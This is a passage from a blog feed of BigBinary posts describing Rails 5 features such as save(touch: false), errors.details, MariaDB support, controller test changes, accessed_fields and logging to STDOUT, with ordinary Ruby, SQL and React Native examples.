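How such aliases can be expressed in terms of a generic `after_commit(on:)` registration is sketched below. `Callbacks` is an illustrative registry, not Active Record's callback machinery; each alias simply fixes the `:on` option.

```ruby
# Illustrative registry: after_#{action}_commit delegates to after_commit
# with the :on option pre-filled.
class Callbacks
  def self.registry
    @registry ||= Hash.new { |hash, key| hash[key] = [] }
  end

  def self.after_commit(method_name, on:)
    registry[on] << method_name
  end

  # Define the three aliases in one pass.
  %i(create update destroy).each do |action|
    define_singleton_method("after_#{action}_commit") do |method_name|
      after_commit(method_name, on: action)
    end
  end
end

Callbacks.after_create_commit(:send_welcome_mail)
Callbacks.after_destroy_commit(:remove_profile_data)
puts Callbacks.registry[:create].inspect  # => [:send_welcome_mail]
puts Callbacks.registry[:destroy].inspect # => [:remove_profile_data]
```

This mirrors the spirit of the Rails change: the aliases add no new behaviour, only a shorter spelling for a fixed `:on` value.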
    </entry><entry>
       <title><![CDATA[Rails 5 Updating a record without updating timestamps]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-updating-without-updating-timestamps"/>
      <updated>2016-05-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-updating-without-updating-timestamps</id>
<content type="html"><![CDATA[<p>In Rails 4.x, when we save an <code>ActiveRecord</code> object, Rails automatically updates the fields <code>updated_at</code> or <code>updated_on</code>.</p><pre><code class="language-ruby">&gt;&gt; user = User.new(name: 'John', email: 'john@example.com')&gt;&gt; user.save INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;, &quot;email&quot;) VALUES (?, ?, ?, ?)  [[&quot;name&quot;, &quot;John&quot;], [&quot;created_at&quot;, 2016-03-16 09:12:44 UTC], [&quot;updated_at&quot;, 2016-03-16 09:12:44 UTC], [&quot;email&quot;, &quot;john@example.com&quot;]]=&gt; true&gt;&gt; user.updated_at=&gt; Wed, 16 Mar 2016 09:12:44 UTC +00:00&gt;&gt; user.name = &quot;Mark&quot;&gt;&gt; user.save  UPDATE &quot;users&quot; SET &quot;name&quot; = ?, &quot;updated_at&quot; = ? WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;name&quot;, &quot;Mark&quot;], [&quot;updated_at&quot;, 2016-03-16 09:15:30 UTC], [&quot;id&quot;, 12]]=&gt; true&gt;&gt; user.updated_at=&gt; Wed, 16 Mar 2016 09:15:30 UTC +00:00</code></pre><h2>Addition of touch option in ActiveRecord::Base#save</h2><p>In Rails 5, by passing <code>touch: false</code> as an option to <code>save</code>, we can update the object without updating timestamps. The default value of <code>touch</code> is <code>true</code>.</p><pre><code class="language-ruby">&gt;&gt; user.updated_at=&gt; Wed, 16 Mar 2016 09:15:30 UTC +00:00&gt;&gt; user.name = &quot;Dan&quot;&gt;&gt; user.save(touch: false)  UPDATE &quot;users&quot; SET &quot;name&quot; = ? WHERE &quot;users&quot;.&quot;id&quot; = ?  
[[&quot;name&quot;, &quot;Dan&quot;], [&quot;id&quot;, 12]]=&gt; true&gt;&gt; user.updated_at=&gt; Wed, 16 Mar 2016 09:15:30 UTC +00:00</code></pre><p>This works only when we are updating a record and does not work when a record is created.</p><pre><code class="language-ruby">&gt;&gt; user = User.new(name: 'Tom', email: 'tom@example.com')&gt;&gt; user.save(touch: false) INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;, &quot;email&quot;) VALUES (?, ?, ?, ?)  [[&quot;name&quot;, &quot;Tom&quot;], [&quot;created_at&quot;, 2016-03-21 06:57:23 UTC], [&quot;updated_at&quot;, 2016-03-21 06:57:23 UTC], [&quot;email&quot;, &quot;tom@example.com&quot;]]&gt;&gt; user.updated_at=&gt; Mon, 21 Mar 2016 07:04:04 UTC +00:00</code></pre>]]></content>
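The semantics of `save(touch: false)` can be summed up in a small plain-Ruby model: timestamps are always written on create, and skipped on update only when `touch: false` is passed. The `Record` class below is a toy stand-in, not Active Record:

```ruby
class Record
  attr_accessor :name
  attr_reader :updated_at

  def initialize(name)
    @name = name
    @new_record = true
  end

  def save(touch: true)
    # on create the timestamp is written regardless of touch;
    # on update it is written only when touch is true
    @updated_at = Time.now.utc if @new_record || touch
    @new_record = false
    true
  end
end

user = Record.new("Tom")
user.save(touch: false)      # create: timestamp still gets set
created_stamp = user.updated_at

user.name = "Dan"
user.save(touch: false)      # update: timestamp left untouched
```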
    </entry><entry>
       <title><![CDATA[Rails 5 Retrieving info of failed validations]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-a-way-to-get-information-about-types-of-failed-validations"/>
      <updated>2016-05-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-a-way-to-get-information-about-types-of-failed-validations</id>
<content type="html"><![CDATA[<p>Let's look at a validation example in Rails 4.x.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  validates :email, presence: trueend&gt;&gt; user = User.new&gt;&gt; user.valid?=&gt; false&gt;&gt; user.errors.messages=&gt; {:email=&gt;[&quot;can't be blank&quot;]}</code></pre><p>In this case, we do not get any information about the type of failed validation, as <code>ActiveModel#Errors</code> only gives the attribute name and the translated error message.</p><p>This works out well for normal apps. But in the case of API-only applications, sometimes we want to allow the client consuming the API to generate customized error messages as per their needs. We don't want to send the final translated messages in such cases. Instead, if we could just send details that the <code>presence</code> validation failed for the <code>:email</code> attribute, the client app would be able to customize the error message based on that information.</p><p>In Rails 5, it is now possible to get such details about which validations failed for a given attribute.</p><p>We can check this by calling the<a href="https://github.com/rails/rails/pull/18322">details method</a> on the<code>ActiveModel#Errors</code> instance.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  validates :email, presence: trueend&gt;&gt; user = User.new&gt;&gt; user.valid?=&gt; false&gt;&gt; user.errors.details=&gt; {:email=&gt;[{:error=&gt;:blank}]}</code></pre><p>We can also add custom validator types as per our need.</p><pre><code class="language-ruby"># Custom validator type&gt;&gt; user = User.new&gt;&gt; user.errors.add(:name, :not_valid, message: &quot;The name appears invalid&quot;)&gt;&gt; user.errors.details=&gt; {:name=&gt;[{:error=&gt;:not_valid}]}# Custom error with default validator type :invalid&gt;&gt; user = User.new&gt;&gt; user.errors.add(:name)&gt;&gt; user.errors.details=&gt; {:name=&gt;[{:error=&gt;:invalid}]}# More than one error on one 
attribute&gt;&gt; user = User.new&gt;&gt; user.errors.add(:password, :invalid_format, message: &quot;Password must start with an alphabet&quot;)&gt;&gt; user.errors.add(:password, :invalid_length, message: &quot;Password must have at least 8 characters&quot;)&gt;&gt; user.errors.details=&gt; {:password=&gt;[{:error=&gt;:invalid_format}, {:error=&gt;:invalid_length}]}</code></pre><h2>Passing contextual information about the errors</h2><p>We can also send contextual data for the validation to the <code>Errors#add</code> method. This data can later be accessed via the <code>Errors#details</code> method, because the <code>Errors#add</code> method forwards all options except <code>:message</code>, <code>:if</code>, <code>:unless</code>, and <code>:on</code> to <code>details</code>.</p><p>For example, we can say that the <code>password</code> is invalid because <code>!</code> is not allowed, as follows.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  validate :password_cannot_have_invalid_character  def password_cannot_have_invalid_character    if password.scan(&quot;!&quot;).present?      errors.add(:password, :invalid_character, not_allowed: &quot;!&quot;)    end  endend&gt;&gt; user = User.create(name: 'Mark', password: 'Ra!ls')&gt;&gt; user.errors.details=&gt; {:password=&gt;[{:error=&gt;:invalid_character, :not_allowed=&gt;&quot;!&quot;}]}</code></pre><p>We can also use this feature in our Rails 4.x apps by simply installing the gem<a href="https://github.com/cowbell/active_model-errors_details">active_model-errors_details</a>.</p>]]></content>
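The behaviour described above — `add` recording both a translated message and a machine-readable detail hash, with reserved options filtered out — can be captured in a small plain-Ruby sketch (illustrative only, not the real `ActiveModel::Errors`):

```ruby
class Errors
  # options that add keeps to itself and does not forward to details
  RESERVED_KEYS = [:message, :if, :unless, :on].freeze

  def initialize
    @messages = Hash.new { |h, k| h[k] = [] }
    @details  = Hash.new { |h, k| h[k] = [] }
  end

  attr_reader :messages, :details

  def add(attribute, type = :invalid, **options)
    @messages[attribute] << (options[:message] || type.to_s)
    extra = options.reject { |key, _| RESERVED_KEYS.include?(key) }
    @details[attribute] << { error: type }.merge(extra)
  end
end

errors = Errors.new
errors.add(:password, :invalid_character, not_allowed: "!")
errors.add(:name)   # default type is :invalid

errors.details
# => {:password=>[{:error=>:invalid_character, :not_allowed=>"!"}],
#     :name=>[{:error=>:invalid}]}
```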
    </entry><entry>
       <title><![CDATA[Using Image as a Container in React Native]]></title>
       <author><name>Bilal Budhani</name></author>
      <link href="https://www.bigbinary.com/blog/using-image-as-a-container-in-react-native"/>
      <updated>2016-04-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-image-as-a-container-in-react-native</id>
<content type="html"><![CDATA[<p>Adding a nice looking background to a screen makes an app visually appealing. It also makes the app look more sleek and elegant. Let us see how we can leverage this technique in React Native and add an image as a background.</p><p>We'll need to create different sizes of the background image, which we're going to use as a container. React Native will pick up the appropriate image based on the device's dimensions (check the<a href="http://facebook.github.io/react-native/docs/images.html#content">Images guide</a> for more information).</p><pre><code class="language-plaintext">- login-background.png (375x667)- login-background@2x.png (750x1134)- login-background@3x.png (1125x2001)</code></pre><p>Now we'll use these images in our code as a container.</p><pre><code class="language-javascript">//...render() {    return (      &lt;Image        source={require('./images/login-background.png')}        style={styles.container}&gt;        &lt;Text style={styles.welcome}&gt;          Welcome to React Native!        &lt;/Text&gt;        &lt;Text style={styles.instructions}&gt;          To get started, edit index.ios.js        &lt;/Text&gt;        &lt;Text style={styles.instructions}&gt;          Press Cmd+R to reload,{'\n'}          Cmd+D or shake for dev menu        &lt;/Text&gt;      &lt;/Image&gt;    );  }//...const styles = StyleSheet.create({  container: {    flex: 1,    width: undefined,    height: undefined,    backgroundColor:'transparent',    justifyContent: 'center',    alignItems: 'center',  },});</code></pre><p>We've intentionally left the height and width of the image as <code>undefined</code>. This will let React Native take the size of the image from the image itself. This way, we can use the Image component as a View and add other components as children to build the UI.</p><p><img src="/blog_images/2016/using-image-as-a-container-in-react-native/image-as-container-react-native.png" alt="image as container in react native"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 - What's in it for me?]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-webinar"/>
      <updated>2016-04-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-webinar</id>
<content type="html"><![CDATA[<p>I recently did a webinar with Srijan on upcoming changes in Rails 5. In this webinar I discussed various features and additions coming up in Rails 5.</p><p>&lt;div class=&quot;youtube-video-container&quot;&gt;&lt;iframe width=&quot;640&quot; height=&quot;480&quot; src=&quot;https://www.youtube.com/embed/ECDX1NH7yWE&quot; frameborder=&quot;0&quot; allowfullscreen&gt;&lt;/iframe&gt;&lt;/div&gt;</p><h2>Major Features</h2><p>Ruby 2.2.2+ dependency.</p><p>Action Cable.</p><p>API only apps.</p><h2>Features for Development mode</h2><p>Puma as default web server.</p><p><code>rails</code> CLI over <code>rake</code>.</p><p>Restarting app using <code>rails restart</code>.</p><p>Enable caching using <code>rails dev:cache</code>.</p><p>Enhanced filtering of routes using <code>rails routes -g</code>.</p><p>Evented file system monitor.</p><h2>Features for Test mode</h2><p>Test Runner.</p><p>Changes to controller tests.</p><h2>Features related to Caching</h2><p>Cache content forever using <code>http_cache_forever</code>.</p><p>Collection caching using <code>ActiveRecord#cache_key</code>.</p><p>Partials caching using multi_fetch_fragments.</p><p>Caching in Action Mailer views.</p><h2>Changes in Active Record</h2><p>Introduction of <code>ApplicationRecord</code>.</p><p><code>ActiveRelation#or</code>.</p><p><code>has_secure_token</code> for generating secure tokens.</p><p>Versioned migrations for backward compatibility.</p><h2>Changes in Active Support</h2><p>Improvements to Date/Time.</p><p><code>Enumerable#pluck</code>, <code>Enumerable#without</code>.</p><p>Change in behavior related to halting callback chains.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 officially supports MariaDB]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-official-supports-mariadb"/>
      <updated>2016-04-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-official-supports-mariadb</id>
<content type="html"><![CDATA[<p><a href="https://mariadb.org/">MariaDB</a> is an open source fork of the MySQL database and it acts as a drop-in replacement for MySQL.</p><p>After Oracle's<a href="https://www.theguardian.com/technology/2009/dec/14/monty-widenius-oracle-protest">takeover</a> of<a href="http://www.infoworld.com/article/2630216/database/many-open-sourcers-back-an-oracle-takeover-of-mysql.html">MySQL</a>, there was some confusion about the future of MySQL. MariaDB<a href="https://en.wikipedia.org/wiki/MariaDB?oldformat=true">was started</a> to remove any ambiguity about whether MySQL would remain free in the future.</p><p>Some of you might be wondering what advantages MariaDB offers over MySQL. Here is an article which lists<a href="https://seravo.fi/2015/10-reasons-to-migrate-to-mariadb-if-still-using-mysql">10 reasons</a> to migrate to MariaDB from MySQL.</p><p>MariaDB is bundled as the default on systems like<a href="http://www.itwire.com/business-it-news/open-source/60292-red-hat-ditches-mysql-switches-to-mariadb">Redhat's RHEL 7+</a>,<a href="https://www.archlinux.org/news/mariadb-replaces-mysql-in-repositories/">Archlinux</a>,<a href="http://www.slackware.com/index.html">Slackware</a> and<a href="http://marc.info/?l=openbsd-ports-cvs&amp;m=141063182731679&amp;w=2">OpenBSD</a>.</p><p>Some of the users of MariaDB are Google, Mozilla, Facebook and<a href="http://blog.wikimedia.org/2013/04/22/wikipedia-adopts-mariadb/">Wikipedia</a>. Later we found out that <a href="https://basecamp.com/">Basecamp</a> has<a href="https://github.com/rails/rails/pull/24454#issuecomment-206994634">already been using MariaDB</a> for a while.</p><h2>Active Record support for MariaDB</h2><p>Recently, <a href="https://github.com/iangilfillan">Ian Gilfillan</a> from the MariaDB Foundation sent a <a href="https://github.com/rails/rails/pull/24454">Pull Request</a> to include MariaDB as part of the Rails documentation.</p><p>Accepting that pull request means Rails is <a 
href="https://github.com/rails/rails/pull/24522">committing to</a> supporting MariaDB along with MySQL, PostgreSQL and SQLite.</p><p>The tests revealed an <a href="https://travis-ci.org/rails/rails/jobs/122573447">issue</a> related to microsecond precision support on the time column.</p><p>If a column has a time field and we search on that column, then the search was failing for MariaDB.</p><pre><code class="language-ruby">time = ::Time.utc(2000, 1, 1, 12, 30, 0, 999999)Task.create!(start: time)Task.find_by(start: time) # =&gt; nil</code></pre><p>In the above case we created a record. However, the query yielded no record.</p><p>Now let's see why the query did not work for MariaDB.</p><h2>MariaDB vs MySQL time column difference</h2><p>First let's examine the <code>tasks</code> table.</p><pre><code class="language-sql"> mysql&gt; desc tasks;+--------+---------+------+-----+---------+----------------+| Field  | Type    | Null | Key | Default | Extra          |+--------+---------+------+-----+---------+----------------+| id     | int(11) | NO   | PRI | NULL    | auto_increment || start  | time    | YES  |     | NULL    |                |+--------+---------+------+-----+---------+----------------+2 rows in set (0.00 sec)</code></pre><p>In the above case column <code>start</code> is of type <code>time</code>.</p><p>Let's insert a record into the <code>tasks</code> table.</p><pre><code class="language-sql">mysql&gt; INSERT INTO `tasks` (`start`) VALUES ('2000-01-01 12:30:00');</code></pre><p>Now let's query the table.</p><pre><code class="language-sql">mysql&gt; SELECT  `tasks`.* FROM `tasks` WHERE `tasks`.`start` = '2000-01-01 12:30:00' LIMIT 1;Empty set (0.00 sec)</code></pre><p>In the above case the query is passing the date part (2000-01-01) along with the time part (12:30:00) for column <code>start</code>, and we did not get any result.</p><p>Now let's query again, but this time we will pass only the time part to the <code>start</code> column.</p><pre><code class="language-sql">mysql&gt; SELECT  
`tasks`.* FROM `tasks` WHERE `tasks`.`start` = '12:30:00' LIMIT 1;+----+----------+| id | start    |+----+----------+|  1 | 12:30:00 |+----+----------+1 row in set (0.00 sec)</code></pre><p>So in the query, if we pass <code>2000-01-01 12:30:00</code> to a column which is of type <code>time</code>, then MariaDB fails.</p><p>Passing <code>2000-01-01 12:30:00</code> to MySQL, PostgreSQL and SQLite will work fine. That's because the adapters for those databases will drop the date part if a date is passed in the query string.</p><p>For MariaDB, a similar fix was needed, and soon enough a<a href="https://github.com/rails/rails/pull/24542">Pull Request</a> taking care of this behavior on the Rails side landed. MariaDB itself is<a href="https://jira.mariadb.org/browse/MDEV-9541">working</a> on supporting this behavior now.</p><h2>Summary</h2><p>In summary, Rails 5 officially supports MariaDB, and MariaDB can now safely be used as an alternative to MySQL for Ruby on Rails applications.</p>]]></content>
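One way to express the adapter-side fix in plain Ruby: before binding a value to a time-typed column, keep only the time-of-day portion and drop the date. `time_only` below is a hypothetical helper for illustration, not Rails' actual adapter code:

```ruby
# Drop the date part of a Time so the comparison works against a
# time-typed column (as the MariaDB query above requires).
# Hypothetical helper, not the Rails adapter implementation.
def time_only(value)
  value.strftime("%H:%M:%S")
end

full = Time.utc(2000, 1, 1, 12, 30, 0)
time_only(full) # => "12:30:00" -- safe to use in WHERE `start` = ...
```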
    </entry><entry>
       <title><![CDATA[Changes to test controllers in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/changes-to-test-controllers-in-rails-5"/>
      <updated>2016-04-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/changes-to-test-controllers-in-rails-5</id>
<content type="html"><![CDATA[<p>In Rails 5, controller tests have undergone some major changes. In this blog post, we will walk through some of those changes.</p><h3>ActionController::TestCase is deprecated</h3><p>In Rails 5, controller tests are generated with the superclass <code>ActionDispatch::IntegrationTest</code> instead of <code>ActionController::TestCase</code>, which is deprecated. It will be moved into a separate gem in Rails 5.1.</p><p>Rails 5 will use <code>ActionDispatch::IntegrationTest</code> by default for generating scaffolds as well as<a href="https://github.com/rails/rails/pull/22569">controller test stubs</a>.</p><h3>Use URL instead of action name with request methods in Rails 5</h3><p>In Rails 4.x, we pass the controller action as shown below.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionController::TestCase  def test_index_response    get :index    assert_response :success  endend</code></pre><p>But in Rails 5, controller tests expect to receive a URL instead of an action. 
Otherwise the test will throw the exception <code>URI::InvalidURIError: bad URI</code>.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def test_index    get products_url    assert_response :success  endend</code></pre><p>If we are upgrading an older Rails 4.x app to Rails 5 which has test cases with the superclass <code>ActionController::TestCase</code>, then they will continue to work as-is without requiring any changes.</p><h2>Deprecation of assigns and assert_template in controller tests</h2><p>In Rails 4.x, we can test instance variables assigned in a controller action, and which template a particular controller action renders, using the <code>assigns</code> and <code>assert_template</code> methods.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionController::TestCase  def test_index_template_rendered    get :index    assert_template :index    assert_equal Product.all, assigns(:products)  endend</code></pre><p>But in Rails 5, calling <code>assert_template</code> or <code>assigns</code> will throw an exception.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def test_index_template_rendered    get products_url    assert_template :index    assert_equal Product.all, assigns(:products)  endend# Throws exception NoMethodError: assert_template has been extracted to a gem. 
To continue using it, add `gem 'rails-controller-testing'` to your Gemfile.</code></pre><p>These two methods have now been <a href="https://github.com/rails/rails/pull/20138">removed</a> from the core and moved to a separate gem,<a href="https://github.com/rails/rails-controller-testing">rails-controller-testing</a>. If we still want to use <code>assert_template</code> and <code>assigns</code>, then we can do so by adding this gem to our applications.</p><h2>Reasons for removing assigns and assert_template</h2><p>The idea behind the removal of these methods is that instance variables and which template is rendered in a controller action are internals of the controller, and controller tests should not care about them.</p><p>According to the Rails team, controller tests should be more concerned with the result of the controller action, such as which cookies are set or which HTTP code is returned, rather than with testing the internals of the controller. So, these methods were removed from the core.</p><h2>Use of keyword arguments in HTTP request methods in Rails 5</h2><p>In Rails 4.x, we pass various arguments like params, flash messages and session variables to the request method directly.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionController::TestCase  def test_show    get :show, { id: user.id }, { notice: 'Welcome' }, { admin: user.admin? }    assert_response :success  endend</code></pre><p>Where <code>{ id: user.id }</code> is the params, <code>{ notice: 'Welcome' }</code> is the flash and <code>{ admin: user.admin? 
}</code> is the session.</p><p>This becomes confusing sometimes, as it is not clear which argument belongs to which part.</p><p>Now in Rails 5, request methods accept only <a href="https://github.com/rails/rails/pull/18323/">keyword arguments</a>.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def test_create    post product_url, params: { product: { name: &quot;FIFA&quot; } }    assert_response :success  endend</code></pre><p>This makes it easier to understand which arguments are being passed.</p><p>When we pass arguments without keywords, Rails logs a deprecation warning.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def test_create    post product_url, { product: { name: &quot;FIFA&quot; } }    assert_response :success  endendDEPRECATION WARNING: ActionDispatch::IntegrationTest HTTP request methods will accept only the following keyword arguments in future Rails versions: params, headers, env, xhr</code></pre>]]></content>
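The readability gain from keyword arguments can be shown with a toy request helper (a hypothetical method for illustration, not ActionDispatch's API): each hash is labelled at the call site, so there is no ambiguity about which one is params, headers, or session.

```ruby
# Toy request helper: every hash argument is named, unlike the Rails 4.x
# positional style where position alone decided meaning.
def get(url, params: {}, headers: {}, session: {})
  { url: url, params: params, headers: headers, session: session }
end

request = get("/products/1", params: { id: 1 }, session: { admin: true })
# headers was omitted entirely -- it simply defaults to {}
```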
    </entry><entry>
       <title><![CDATA[accessed_fields to find active fields in application]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/accesssed-fields-to-find-actually-used-fileds-in-Rails-5"/>
      <updated>2016-04-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/accesssed-fields-to-find-actually-used-fileds-in-Rails-5</id>
<content type="html"><![CDATA[<p>Rails makes it very easy to select all the fields of a table.</p><pre><code class="language-ruby">@users = User.all</code></pre><p>The above code selects all the columns of the table <code>users</code>. This might be ok in most cases. However, in some cases we might want to select only certain columns for performance reasons. The difficult task is finding which columns are actually used in a request.</p><p>To help with this task, Rails 5 has added the<a href="https://github.com/rails/rails/commit/be9b68038e83a617eb38c26147659162e4ac3d2c">accessed_fields</a> method, which lists the attributes that were actually used in the operation.</p><p>This is helpful in development mode for determining which fields are really being used by the application.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    @users = User.all  endend</code></pre><pre><code class="language-erb"># app/views/users/index.html.erb&lt;table&gt;  &lt;tr&gt;    &lt;th&gt;Name&lt;/th&gt;    &lt;th&gt;Email&lt;/th&gt;  &lt;/tr&gt;  &lt;% @users.each do |user| %&gt;    &lt;tr&gt;      &lt;td&gt;&lt;%= user.name %&gt;&lt;/td&gt;      &lt;td&gt;&lt;%= user.email %&gt;&lt;/td&gt;    &lt;/tr&gt;  &lt;% end %&gt;&lt;/table&gt;</code></pre><p>Now, in order to find all the fields that were actually used, let's add an<code>after_action</code> to the controller.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  after_action :print_accessed_fields  def index    @users = User.all  end  private  def print_accessed_fields    p @users.first.accessed_fields  endend</code></pre><p>Let's take a look at the log file.</p><pre><code class="language-plaintext">Processing by UsersController#index as HTML  User Load (0.1ms) SELECT &quot;users&quot;.* FROM &quot;users&quot;  Rendered users/index.html.erb within layouts/application (1.0ms)  [&quot;name&quot;, &quot;email&quot;]</code></pre><p>As we can see, it returns 
<code>[&quot;name&quot;, &quot;email&quot;]</code> as the attributes which were actually used.</p><p>If the <code>users</code> table has 20 columns, then we do not need to load values for all those other columns. We are using only two columns. So let's change the code to reflect that.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    @users = User.select(:name, :email)  endend</code></pre>]]></content>
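What `accessed_fields` amounts to is recording which attributes were read. A plain-Ruby sketch of that tracking (illustrative, not Rails' implementation) can be built with `method_missing`:

```ruby
# Toy record that tracks which attributes were read, mimicking the idea
# behind accessed_fields. Not Active Record.
class TrackedRecord
  def initialize(attributes)
    @attributes = attributes
    @accessed = []
  end

  def accessed_fields
    @accessed.uniq
  end

  def method_missing(name, *args)
    key = name.to_s
    if @attributes.key?(key)
      @accessed << key        # record the read before returning the value
      @attributes[key]
    else
      super
    end
  end

  def respond_to_missing?(name, include_private = false)
    @attributes.key?(name.to_s) || super
  end
end

user = TrackedRecord.new("name" => "Jane", "email" => "j@example.com", "bio" => "...")
user.name
user.email
user.accessed_fields # => ["name", "email"] -- bio was never read
```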
    </entry><entry>
       <title><![CDATA[Rails 5 Warning when fetching with Active Record]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-option-to-log-warning-when-fetching-big-result-sets"/>
      <updated>2016-04-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-option-to-log-warning-when-fetching-big-result-sets</id>
<content type="html"><![CDATA[<p>With a large data set, we can run into memory issues. Here is an example.</p><pre><code class="language-ruby">&gt;&gt; Post.published.count=&gt; 25000&gt;&gt; Post.where(published: true).each do |post|     post.archive!   end# Loads 25000 posts in memory</code></pre><h2>Rails 5 adds warning when loading large data set</h2><p>To mitigate the issue shown above, Rails 5<a href="https://github.com/rails/rails/pull/18846">has added</a><code>config.active_record.warn_on_records_fetched_greater_than</code>.</p><p>When this configuration is set to an integer value, any query that returns a number of records greater than the set limit logs a warning.</p><pre><code class="language-ruby">config.active_record.warn_on_records_fetched_greater_than = 1500&gt;&gt; Post.where(published: true).each do |post|     post.archive!   end=&gt; Query fetched 25000 Post records: SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;published&quot; = ? [[&quot;published&quot;, true]]   [#&lt;Post id: 1, title: 'Rails', user_id: 1, created_at: &quot;2016-02-11 11:32:32&quot;, updated_at: &quot;2016-02-11 11:32:32&quot;, published: true&gt;, #&lt;Post id: 2, title: 'Ruby', user_id: 2, created_at: &quot;2016-02-11 11:36:05&quot;, updated_at: &quot;2016-02-11 11:36:05&quot;, published: true&gt;,....]</code></pre><p>This helps us find areas where potential problems exist, and then we can replace inefficient queries with better ones.</p><pre><code class="language-ruby">config.active_record.warn_on_records_fetched_greater_than = 1500&gt;&gt; Post.where(published: true).find_each do |post|     post.archive!   end# No warning is logged</code></pre>]]></content>
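Why does `find_each` avoid the warning? It pulls records in fixed-size batches instead of materialising the whole result set at once. A plain-Ruby sketch, with an array standing in for the posts table (illustrative, not Active Record's batching code):

```ruby
# Toy posts "table"
POSTS = (1..25_000).to_a

# Batched iteration in the spirit of find_each: only batch_size
# records are held in the working batch at a time.
def find_each(batch_size: 1000)
  POSTS.each_slice(batch_size) do |batch|
    batch.each { |post| yield post }
  end
end

archived = 0
find_each(batch_size: 1000) { |_post| archived += 1 }
archived # => 25000, processed 1000 records at a time
```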
    </entry><entry>
       <title><![CDATA[Rails 5 Sending STDOUT via environment variable]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-to-send-log-to-stdout-via-environment-variable"/>
      <updated>2016-04-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-to-send-log-to-stdout-via-environment-variable</id>
<content type="html"><![CDATA[<p>By default, Rails writes logs to a file in the <code>log</code> directory that is named after the environment in which the application is running. So in the production environment, logs are by default directed to the <code>production.log</code> file.</p><p>We will have to define custom loggers if these logs are to be directed to another file or to standard output. The presence of such custom logic is what enables Rails to direct logs to <code>STDOUT</code> along with the <code>development.log</code> file in the development environment.</p><p>Rails 5, however,<a href="https://github.com/rails/rails/pull/23734">supports logging to STDOUT</a> in the production environment through the introduction of a new environment variable, <code>RAILS_LOG_TO_STDOUT</code>.</p><p>In a brand new Rails app, we can see the following snippet in the <code>production.rb</code> file.</p><pre><code class="language-ruby">if ENV[&quot;RAILS_LOG_TO_STDOUT&quot;].present?  config.logger = ActiveSupport::TaggedLogging.new(Logger.new(STDOUT))end</code></pre><p>By setting <code>RAILS_LOG_TO_STDOUT</code> to any value, we should have the production logs directed to <code>STDOUT</code>.</p><p>We can see in the snippet above that <code>config.logger</code> is overwritten. Therefore the logs will no longer be directed to the <code>production.log</code> file.</p><p>To opt out of this and revert to the original functionality, we can either assign a blank value to this environment variable or remove <code>RAILS_LOG_TO_STDOUT</code> from the list of environment variables.</p>]]></content>
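The effect of the `production.rb` snippet can be sketched in plain Ruby: pick a log device based on whether the environment variable is present. `pick_log_device` is a hypothetical helper, and `StringIO` objects stand in for `STDOUT` and `log/production.log` so the example is self-contained:

```ruby
require "logger"
require "stringio"

# Choose the log device the way the production.rb snippet does:
# any non-blank value in RAILS_LOG_TO_STDOUT selects stdout.
def pick_log_device(env, stdout:, log_file:)
  env["RAILS_LOG_TO_STDOUT"].to_s.strip.empty? ? log_file : stdout
end

stdout_io = StringIO.new # stands in for STDOUT
file_io   = StringIO.new # stands in for log/production.log

device = pick_log_device({ "RAILS_LOG_TO_STDOUT" => "enabled" },
                         stdout: stdout_io, log_file: file_io)
Logger.new(device).info("booted")
```

With the variable unset (or blank), the same call returns the file device, matching the opt-out behavior described above.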
    </entry><entry>
       <title><![CDATA[Validate multiple contexts together in Rails 5]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/validate-multiple-contexts-in-rails-5"/>
      <updated>2016-04-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/validate-multiple-contexts-in-rails-5</id>
